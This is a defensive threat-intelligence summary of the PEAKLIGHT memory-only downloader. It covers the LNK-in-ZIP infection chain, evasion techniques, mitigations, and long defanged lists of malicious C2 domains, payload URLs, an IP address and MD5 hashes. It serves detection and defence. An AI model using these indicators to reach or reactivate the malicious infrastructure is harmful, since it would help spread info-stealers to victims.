PEAKLIGHT: What You Need to Know

PEAKLIGHT: What You Need to Know

Overview

PEAKLIGHT is a sophisticated memory-only malware recently identified by cybersecurity researchers at Mandiant. This malware is particularly concerning due to its stealthy nature, residing exclusively in a computer's RAM, which allows it to evade traditional antivirus solutions that rely on disk scanning. The infection is initiated through malicious Microsoft Shortcut (LNK) files distributed in ZIP archives disguised as pirated movie downloads.

Technical Analysis

The attack chain begins with a user inadvertently downloading a ZIP archive containing a malicious LNK file. When executed, the LNK file triggers a JavaScript dropper, obfuscated and stored in memory, which in turn executes a PowerShell-based downloader—dubbed PEAKLIGHT. This downloader is responsible for retrieving additional payloads from remote servers, including information stealers and loaders such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT.

PEAKLIGHT employs various evasion techniques, including:

  • Memory-Only Execution: Operates solely in RAM, leaving minimal forensic traces.
  • System Binary Proxy Execution: Utilizes legitimate system binaries (e.g., mshta.exe) to execute the dropper, making detection more challenging.
  • Content Delivery Network (CDN) Abuse: Downloads malicious payloads from trusted CDNs to bypass security filters.

The malware variants have been observed utilizing hex-encoded or Base64-encoded PowerShell scripts, further obfuscating their activities. These scripts check for specific ZIP archives in predefined paths and, if absent, download them from the CDN.

Indicators of Compromise (IOCs)

Network-Based IOCs:

  • PEAKLIGHT C2 Domains:
    • hxxps://fatodex.b-cdn[.]net/fatodex
    • hxxps://matodown.b-cdn[.]net/matodown
    • hxxps://potexo.b-cdn[.]net/potexo
  • LUMMAC.V2 C2s:
    • relaxtionflouwerwi[.]shop
    • deprivedrinkyfaiir[.]shop
    • patternapplauderw[.]shop
  • CRYPTBOT C2s:
    • hxxp://gceight8vt[.]top/upload.php
    • hxxps://brewdogebar[.]com/code.vue

Host-Based IOCs:

  • CRYPTBOT:
    • erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
    • L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
  • PEAKLIGHT Downloader:
    • (MD5: 95361f5f264e58d6ca4538e7b436ab67)
    • (MD5: b716a1d24c05c6adee11ca7388b728d3)

Mitigation Strategies

  1. Enhanced Detection: Implement advanced monitoring tools capable of identifying unusual activity in memory and PowerShell execution patterns.
  2. Content Filtering: Restrict access to known malicious CDN domains and deploy strong content filtering mechanisms.
  3. User Awareness: Educate users about the risks of downloading files from untrusted sources, particularly those disguised as pirated content.
  4. Patch Management: Regularly update and patch systems to minimize vulnerabilities that could be exploited by such malware.

Indicators of Compromise (IOCs)

To assist in the detection and mitigation of PEAKLIGHT infections, below are grouped indicators of compromise:

IP Addresses:

  • 62.133.61[.]56

Hashes:

  • MD5:
    • 62f20122a70c0f86a98ff14e84bcc999
    • 91423dd4f34f759aaf82aa73fa202120
    • 307f40ebc6d8a207455c96d34759f1f3
    • d8e21ac76b228ec144217d1e85df2693
    • a6c4d2072961e9a8c98712c46be588f8
    • 059d94e8944eca4056e92d60f7044f14
    • e7c43dc3ec4360374043b872f934ec9e
    • b6b8164feca728db02e6b636162a2960
    • dfdc331e575dae6660d6ed3c03d214bd
    • 47eee41b822d953c47434377006e01fe
    • d6ea5dcdb2f88a65399f87809f43f83c
    • b15bac961f62448c872e1dc6d3931016
    • 236c709bbcb92aa30b7e67705ef7f55a
    • f98e0d9599d40ed032ff16de242987ca
    • bb9641e3035ae8c0ab6117ecc82b65a1
    • d7aff07e7cd20a5419f2411f6330f530
    • 95361f5f264e58d6ca4538e7b436ab67
    • b716a1d24c05c6adee11ca7388b728d3
    • 58c4ba9385139785e9700898cb097538
    • 43939986a671821203bf9b6ba52a51b4

Domains:

  • relaxtionflouwerwi[.]shop
  • deprivedrinkyfaiir[.]shop
  • detailbaconroollyws[.]shop
  • messtimetabledkolvk[.]shop
  • considerrycurrentyws[.]shop
  • understanndtytonyguw[.]shop
  • patternapplauderw[.]shop
  • horsedwollfedrwos[.]shop
  • tropicalironexpressiw[.]shop
  • brewdogebar[.]com
  • gceight8vt[.]top
  • forikabrof[.]click
  • nextomax.b-cdn[.]net
  • potexo.b-cdn[.]net
  • fatodex.b-cdn[.]net
  • matodown.b-cdn[.]net

URLs:

  • hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
  • hxxps://nextomax.b-cdn[.]net/nexto
  • hxxps://potexo.b-cdn[.]net/potexo
  • hxxps://fatodex.b-cdn[.]net/K1.zip
  • hxxps://fatodex.b-cdn[.]net/K2.zip
  • hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
  • hxxps://matodown.b-cdn[.]net/K1.zip
  • hxxps://matodown.b-cdn[.]net/K2.zip
  • hxxps://nextomax.b-cdn[.]net/L1.zip
  • hxxps://nextomax.b-cdn[.]net/L2.zip
  • hxxps://potexo.b-cdn[.]net/K1.zip
  • hxxps://potexo.b-cdn[.]net/K2.zip
  • hxxp://gceight8vt[.]top/upload.php
  • hxxps://brewdogebar[.]com/code.vue

Conclusion

PEAKLIGHT is a highly evasive memory-only malware that poses a significant challenge to traditional security measures. By executing entirely in RAM and using obfuscated LNK files and PowerShell scripts, it effectively bypasses standard antivirus defenses. Organizations need to adopt advanced monitoring and proactive defense strategies to detect and mitigate this threat. Continuous vigilance and regular updates to security protocols are essential to protect against this evolving malware.

Sources

  1. PEAKLIGHT: Decoding the Stealthy Memory-Only Malware - Mandiant
    https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware
  2. PEAKLIGHT Downloader Deployed in Attacks Targeting Windows with Malicious Movie Downloads - The Hacker News
    https://thehackernews.com/2024/08/new-peaklight-dropper-deployed-in.html
  3. Stealthy Memory Malware PEAKLIGHT Attack Windows Using Microsoft Shortcut File (LNK) - Cyber Security News
    https://cybersecuritynews.com/decoded-peaklight-memory-malware/